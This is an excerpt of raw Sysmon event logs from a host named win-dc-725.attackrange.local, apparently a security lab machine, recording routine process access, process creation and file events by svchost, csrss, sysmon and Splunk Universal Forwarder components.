20:02:52.025{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034865Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.025{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034864Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.025{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034863Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.025{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034862Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.025{CB3070D7-7996-6042-0500-00000000AD01}412528C:\Windows\system32\csrss.exe{CB3070D7-8E6C-6042-E507-00000000AD01}6224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000034861Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.025{CB3070D7-7A31-6042-B100-00000000AD01}45123288C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB3070D7-8E6C-6042-E507-00000000AD01}6224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000034860Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:52.026{CB3070D7-8E6C-6042-E507-00000000AD01}6224C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB3070D7-7997-6042-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{CB3070D7-7A31-6042-B100-00000000AD01}4512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000034899Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.783{CB3070D7-7A31-6042-B500-00000000AD01}36484556C:\Windows\system32\conhost.exe{CB3070D7-8E6D-6042-E807-00000000AD01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034898Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.783{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034897Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.783{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034896Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.783{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034895Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.783{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034894Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.783{CB3070D7-7996-6042-0500-00000000AD01}412780C:\Windows\system32\csrss.exe{CB3070D7-8E6D-6042-E807-00000000AD01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000034893Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.783{CB3070D7-7A31-6042-B100-00000000AD01}45123288C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB3070D7-8E6D-6042-E807-00000000AD01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000034892Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.786{CB3070D7-8E6D-6042-E807-00000000AD01}2460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB3070D7-7997-6042-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{CB3070D7-7A31-6042-B100-00000000AD01}4512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000034891Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.783{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=166856FEA60EF828D7DE1CE8849EA26E,SHA256=B56279B1C8833E1271593C41B9DD437E02070E9BA557E0D79D3FDE79FF8D93C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000034890Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.783{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=78F7796DDF57745FBB9B8306741C4699,SHA256=47934B2250FCCD69ABC3FD1718B33156EF1C611429173E71477957ACC7CE7848,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000034889Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.313{CB3070D7-8E6D-6042-E707-00000000AD01}66284968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{CB3070D7-7A31-6042-B100-00000000AD01}4512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034888Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.181{CB3070D7-7A31-6042-B500-00000000AD01}36484556C:\Windows\system32\conhost.exe{CB3070D7-8E6D-6042-E707-00000000AD01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034887Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.181{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034886Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.181{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034885Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.181{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034884Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.181{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034883Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.181{CB3070D7-7996-6042-0500-00000000AD01}412780C:\Windows\system32\csrss.exe{CB3070D7-8E6D-6042-E707-00000000AD01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000034882Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.181{CB3070D7-7A31-6042-B100-00000000AD01}45123288C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{CB3070D7-8E6D-6042-E707-00000000AD01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000034881Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:53.184{CB3070D7-8E6D-6042-E707-00000000AD01}6628C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{CB3070D7-7997-6042-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{CB3070D7-7A31-6042-B100-00000000AD01}4512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000034918Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.986{CB3070D7-7A3E-6042-E800-00000000AD01}656NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D0E935F3165B12E3DE93C95C766E2DF2,SHA256=6E52C179578061E366AFDC590513E66F7EFA185C5B3040FCFE70392EAC507C57,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000034917Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.986{CB3070D7-7A31-6042-B500-00000000AD01}36484556C:\Windows\system32\conhost.exe{CB3070D7-8E6E-6042-EA07-00000000AD01}352C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034916Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 20:02:54.986{CB3070D7-7998-6042-0C00-00000000AD01}8524804C:\Windows\system32\svchost.exe{CB3070D7-79A8-6042-2B00-00000000AD01}92C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000034915Microsoft-Windows-Sysmon/Operationalwin-dc-725.attackrange.local-2021-03-05 